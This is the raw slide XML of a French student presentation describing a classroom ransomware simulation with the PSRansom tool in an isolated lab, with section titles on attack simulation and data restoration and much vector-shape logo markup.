        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Restaurer les données </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Espace réservé du texte 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{74DBC909-0828-4B6E-968C-E17E5674ED2A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="28"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>4</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="68" name="Espace réservé du texte 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DDA77CD-E995-44FE-88EE-313D6E22C364}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="29"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Conclusion </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Espace réservé du texte 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A730F803-C379-4B6D-891F-F07633FB0980}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="30"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>5</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Espace réservé du texte 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60126474-F19B-4D34-AE58-E9B4AB44D3F2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="32"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8414841" y="2374900"/>
            <a:ext cx="3578712" cy="876300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Simuler l’attaque par ransomware </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé du pied de page 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBDA3956-E470-4067-A099-E74206AD44BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="26"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7440998" y="6415159"/>
            <a:ext cx="4114800" cy="288147"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t>Schola </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Nova</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé du numéro de diapositive 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C33F4F9-CBEE-4EF7-831A-6AEF6F6B4399}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="25"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{F0EC0192-3772-4180-BB8D-B031004094FB}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="275984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Espace réservé du texte 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83CC8C14-918F-4AD4-A1AD-2821E6B8A633}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5171992" y="1477696"/>
            <a:ext cx="6558875" cy="3902607"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" dirty="0"/>
              <a:t>On a réalisé en cour une simulation  comportement d’un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" dirty="0"/>
              <a:t> à l’aide de l’outil </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PSRansom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" dirty="0"/>
              <a:t>, basé sur des scripts PowerShell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" b="0" dirty="0"/>
              <a:t> Un ransomware est un logiciel malveillant qui chiffre les fichiers d’une victime afin d’exiger une rançon. Cette réalisation  uniquement dans un environnement de test isolé, permet d’évaluer la réaction des solutions de sécurité et de sensibiliser aux risques liés à ce type de menace.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Titre 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CAF9BC1D-03F0-47EE-AC4C-BD9D5CE7EED3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5587320" y="558165"/>
            <a:ext cx="2469119" cy="424732"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Présentation </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="17" name="Groupe 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C02E441E-3026-4BB7-BBA9-97D4C15B4919}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="359407" y="6481466"/>
            <a:ext cx="1179834" cy="131423"/>
            <a:chOff x="4071936" y="3205162"/>
            <a:chExt cx="4044593" cy="450532"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="Forme libre : forme 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBC62968-F624-4D57-95EB-F3C0C1BC27EE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4071936" y="3213138"/>
              <a:ext cx="320053" cy="434554"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 276180 w 320053"/>
                <a:gd name="connsiteY0" fmla="*/ 38079 h 434554"/>
                <a:gd name="connsiteX1" fmla="*/ 226840 w 320053"/>
                <a:gd name="connsiteY1" fmla="*/ 9504 h 434554"/>
                <a:gd name="connsiteX2" fmla="*/ 163880 w 320053"/>
                <a:gd name="connsiteY2" fmla="*/ -21 h 434554"/>
                <a:gd name="connsiteX3" fmla="*/ -45 w 320053"/>
                <a:gd name="connsiteY3" fmla="*/ -21 h 434554"/>
                <a:gd name="connsiteX4" fmla="*/ -45 w 320053"/>
                <a:gd name="connsiteY4" fmla="*/ 434510 h 434554"/>
                <a:gd name="connsiteX5" fmla="*/ 88823 w 320053"/>
                <a:gd name="connsiteY5" fmla="*/ 434510 h 434554"/>
                <a:gd name="connsiteX6" fmla="*/ 88823 w 320053"/>
                <a:gd name="connsiteY6" fmla="*/ 281062 h 434554"/>
                <a:gd name="connsiteX7" fmla="*/ 163880 w 320053"/>
                <a:gd name="connsiteY7" fmla="*/ 281062 h 434554"/>
                <a:gd name="connsiteX8" fmla="*/ 226840 w 320053"/>
                <a:gd name="connsiteY8" fmla="*/ 270870 h 434554"/>
                <a:gd name="connsiteX9" fmla="*/ 276180 w 320053"/>
                <a:gd name="connsiteY9" fmla="*/ 242295 h 434554"/>
                <a:gd name="connsiteX10" fmla="*/ 308469 w 320053"/>
                <a:gd name="connsiteY10" fmla="*/ 197814 h 434554"/>
                <a:gd name="connsiteX11" fmla="*/ 319995 w 320053"/>
                <a:gd name="connsiteY11" fmla="*/ 140664 h 434554"/>
                <a:gd name="connsiteX12" fmla="*/ 308469 w 320053"/>
                <a:gd name="connsiteY12" fmla="*/ 83514 h 434554"/>
                <a:gd name="connsiteX13" fmla="*/ 276180 w 320053"/>
                <a:gd name="connsiteY13" fmla="*/ 38079 h 434554"/>
                <a:gd name="connsiteX14" fmla="*/ 211981 w 320053"/>
                <a:gd name="connsiteY14" fmla="*/ 185907 h 434554"/>
                <a:gd name="connsiteX15" fmla="*/ 163213 w 320053"/>
                <a:gd name="connsiteY15" fmla="*/ 203338 h 434554"/>
                <a:gd name="connsiteX16" fmla="*/ 88823 w 320053"/>
                <a:gd name="connsiteY16" fmla="*/ 203338 h 434554"/>
                <a:gd name="connsiteX17" fmla="*/ 88823 w 320053"/>
                <a:gd name="connsiteY17" fmla="*/ 78275 h 434554"/>
                <a:gd name="connsiteX18" fmla="*/ 163213 w 320053"/>
                <a:gd name="connsiteY18" fmla="*/ 78275 h 434554"/>
                <a:gd name="connsiteX19" fmla="*/ 211981 w 320053"/>
                <a:gd name="connsiteY19" fmla="*/ 95325 h 434554"/>
                <a:gd name="connsiteX20" fmla="*/ 229126 w 320053"/>
                <a:gd name="connsiteY20" fmla="*/ 140187 h 434554"/>
                <a:gd name="connsiteX21" fmla="*/ 211981 w 320053"/>
                <a:gd name="connsiteY21" fmla="*/ 185907 h 434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0053" h="434554">
                  <a:moveTo>
                    <a:pt x="276180" y="38079"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="261777" y="25397"/>
                    <a:pt x="245009" y="15685"/>
                    <a:pt x="226840" y="9504"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206527" y="2860"/>
                    <a:pt x="185249" y="-359"/>
                    <a:pt x="163880" y="-21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="-45" y="-21"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="-45" y="434510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="434510"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="281062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163880" y="281062"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="185298" y="281328"/>
                    <a:pt x="206600" y="277880"/>
                    <a:pt x="226840" y="270870"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="245013" y="264698"/>
                    <a:pt x="261783" y="254986"/>
                    <a:pt x="276180" y="242295"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289930" y="229884"/>
                    <a:pt x="300929" y="214732"/>
                    <a:pt x="308469" y="197814"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316343" y="179804"/>
                    <a:pt x="320272" y="160317"/>
                    <a:pt x="319995" y="140664"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320208" y="121015"/>
                    <a:pt x="316281" y="101543"/>
                    <a:pt x="308469" y="83514"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301147" y="66196"/>
                    <a:pt x="290126" y="50689"/>
                    <a:pt x="276180" y="38079"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="211981" y="185907"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="198826" y="198196"/>
                    <a:pt x="181177" y="204505"/>
                    <a:pt x="163213" y="203338"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="88823" y="203338"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="78275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163213" y="78275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="181114" y="77074"/>
                    <a:pt x="198728" y="83233"/>
                    <a:pt x="211981" y="95325"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223624" y="107284"/>
                    <a:pt x="229825" y="123512"/>
                    <a:pt x="229126" y="140187"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229861" y="157124"/>
                    <a:pt x="223670" y="173630"/>
                    <a:pt x="211981" y="185907"/>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3A48E30A-2BD9-4057-B67D-5008A65CBB55}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4517230" y="3213616"/>
              <a:ext cx="365855" cy="434077"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 299611 w 365855"/>
                <a:gd name="connsiteY0" fmla="*/ 214386 h 434077"/>
                <a:gd name="connsiteX1" fmla="*/ 319995 w 365855"/>
                <a:gd name="connsiteY1" fmla="*/ 139710 h 434077"/>
                <a:gd name="connsiteX2" fmla="*/ 308469 w 365855"/>
                <a:gd name="connsiteY2" fmla="*/ 82560 h 434077"/>
                <a:gd name="connsiteX3" fmla="*/ 276180 w 365855"/>
                <a:gd name="connsiteY3" fmla="*/ 38078 h 434077"/>
                <a:gd name="connsiteX4" fmla="*/ 226840 w 365855"/>
                <a:gd name="connsiteY4" fmla="*/ 9503 h 434077"/>
                <a:gd name="connsiteX5" fmla="*/ 163975 w 365855"/>
                <a:gd name="connsiteY5" fmla="*/ -22 h 434077"/>
                <a:gd name="connsiteX6" fmla="*/ -45 w 365855"/>
                <a:gd name="connsiteY6" fmla="*/ -22 h 434077"/>
                <a:gd name="connsiteX7" fmla="*/ -45 w 365855"/>
                <a:gd name="connsiteY7" fmla="*/ 434033 h 434077"/>
                <a:gd name="connsiteX8" fmla="*/ 88823 w 365855"/>
                <a:gd name="connsiteY8" fmla="*/ 434033 h 434077"/>
                <a:gd name="connsiteX9" fmla="*/ 88823 w 365855"/>
                <a:gd name="connsiteY9" fmla="*/ 280585 h 434077"/>
                <a:gd name="connsiteX10" fmla="*/ 153402 w 365855"/>
                <a:gd name="connsiteY10" fmla="*/ 280585 h 434077"/>
                <a:gd name="connsiteX11" fmla="*/ 265702 w 365855"/>
                <a:gd name="connsiteY11" fmla="*/ 434033 h 434077"/>
                <a:gd name="connsiteX12" fmla="*/ 365810 w 365855"/>
                <a:gd name="connsiteY12" fmla="*/ 434033 h 434077"/>
                <a:gd name="connsiteX13" fmla="*/ 243318 w 365855"/>
                <a:gd name="connsiteY13" fmla="*/ 263535 h 434077"/>
                <a:gd name="connsiteX14" fmla="*/ 299611 w 365855"/>
                <a:gd name="connsiteY14" fmla="*/ 214386 h 434077"/>
                <a:gd name="connsiteX15" fmla="*/ 211981 w 365855"/>
                <a:gd name="connsiteY15" fmla="*/ 185144 h 434077"/>
                <a:gd name="connsiteX16" fmla="*/ 163308 w 365855"/>
                <a:gd name="connsiteY16" fmla="*/ 202194 h 434077"/>
                <a:gd name="connsiteX17" fmla="*/ 88823 w 365855"/>
                <a:gd name="connsiteY17" fmla="*/ 202194 h 434077"/>
                <a:gd name="connsiteX18" fmla="*/ 88823 w 365855"/>
                <a:gd name="connsiteY18" fmla="*/ 77798 h 434077"/>
                <a:gd name="connsiteX19" fmla="*/ 163308 w 365855"/>
                <a:gd name="connsiteY19" fmla="*/ 77798 h 434077"/>
                <a:gd name="connsiteX20" fmla="*/ 211981 w 365855"/>
                <a:gd name="connsiteY20" fmla="*/ 94847 h 434077"/>
                <a:gd name="connsiteX21" fmla="*/ 229126 w 365855"/>
                <a:gd name="connsiteY21" fmla="*/ 139710 h 434077"/>
                <a:gd name="connsiteX22" fmla="*/ 211981 w 365855"/>
                <a:gd name="connsiteY22" fmla="*/ 185144 h 434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5855" h="434077">
                  <a:moveTo>
                    <a:pt x="299611" y="214386"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="313527" y="192007"/>
                    <a:pt x="320614" y="166055"/>
                    <a:pt x="319995" y="139710"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="320204" y="120062"/>
                    <a:pt x="316280" y="100590"/>
                    <a:pt x="308469" y="82560"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="301116" y="65533"/>
                    <a:pt x="290096" y="50343"/>
                    <a:pt x="276180" y="38078"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="261778" y="25396"/>
                    <a:pt x="245004" y="15684"/>
                    <a:pt x="226840" y="9503"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="206561" y="2865"/>
                    <a:pt x="185311" y="-353"/>
                    <a:pt x="163975" y="-22"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="-45" y="-22"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="-45" y="434033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="434033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="280585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="153402" y="280585"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="265702" y="434033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="365810" y="434033"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="243318" y="263535"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="266369" y="252830"/>
                    <a:pt x="285895" y="235782"/>
                    <a:pt x="299611" y="214386"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="211981" y="185144"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="198760" y="197222"/>
                    <a:pt x="181177" y="203380"/>
                    <a:pt x="163308" y="202194"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="88823" y="202194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88823" y="77798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="163308" y="77798"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="181168" y="76657"/>
                    <a:pt x="198732" y="82809"/>
                    <a:pt x="211981" y="94847"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="223621" y="106807"/>
                    <a:pt x="229822" y="123035"/>
                    <a:pt x="229126" y="139710"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="229898" y="156567"/>
                    <a:pt x="223697" y="172997"/>
                    <a:pt x="211981" y="185144"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:grp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8C2DFD4C-120B-48B9-941B-BF0E4C040223}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5020817" y="3213067"/>
              <a:ext cx="88868" cy="434721"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 88868"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX1" fmla="*/ 88868 w 88868"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 434721"/>
                <a:gd name="connsiteX2" fmla="*/ 88868 w 88868"/>
                <a:gd name="connsiteY2" fmla="*/ 434721 h 434721"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 88868"/>
                <a:gd name="connsiteY3" fmla="*/ 434721 h 434721"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="88868" h="434721">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="88868" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88868" y="434721"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="434721"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:grp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D58E7875-9341-4220-8077-B4BDAB8E91A2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5296947" y="3205162"/>
              <a:ext cx="370141" cy="450532"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 281178 w 370141"/>
                <a:gd name="connsiteY0" fmla="*/ 267367 h 450532"/>
                <a:gd name="connsiteX1" fmla="*/ 29623 w 370141"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 450532"/>
                <a:gd name="connsiteX2" fmla="*/ 0 w 370141"/>
                <a:gd name="connsiteY2" fmla="*/ 0 h 450532"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 370141"/>
                <a:gd name="connsiteY3" fmla="*/ 442627 h 450532"/>
                <a:gd name="connsiteX4" fmla="*/ 88868 w 370141"/>
                <a:gd name="connsiteY4" fmla="*/ 442627 h 450532"/>
                <a:gd name="connsiteX5" fmla="*/ 88868 w 370141"/>
                <a:gd name="connsiteY5" fmla="*/ 181832 h 450532"/>
                <a:gd name="connsiteX6" fmla="*/ 341185 w 370141"/>
                <a:gd name="connsiteY6" fmla="*/ 450533 h 450532"/>
                <a:gd name="connsiteX7" fmla="*/ 370142 w 370141"/>
                <a:gd name="connsiteY7" fmla="*/ 450533 h 450532"/>
                <a:gd name="connsiteX8" fmla="*/ 370142 w 370141"/>
                <a:gd name="connsiteY8" fmla="*/ 7906 h 450532"/>
                <a:gd name="connsiteX9" fmla="*/ 281178 w 370141"/>
                <a:gd name="connsiteY9" fmla="*/ 7906 h 450532"/>
                <a:gd name="connsiteX10" fmla="*/ 281178 w 370141"/>
                <a:gd name="connsiteY10" fmla="*/ 267367 h 450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0141" h="450532">
                  <a:moveTo>
                    <a:pt x="281178" y="267367"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="29623" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88868" y="442627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="88868" y="181832"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="341185" y="450533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370142" y="450533"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="370142" y="7906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281178" y="7906"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="281178" y="267367"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:grpFill/>
            <a:ln w="9525" cap="flat">
              <a:noFill/>
              <a:prstDash val="solid"/>
              <a:miter/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="fr-FR"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="Forme libre : forme 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B5D8457-8431-4788-8898-65CE96E3D3A8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5812535" y="3213067"/>
              <a:ext cx="367474" cy="434721"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 367474"/>
                <a:gd name="connsiteY0" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX1" fmla="*/ 138970 w 367474"/>
                <a:gd name="connsiteY1" fmla="*/ 80391 h 434721"/>
                <a:gd name="connsiteX2" fmla="*/ 138970 w 367474"/>
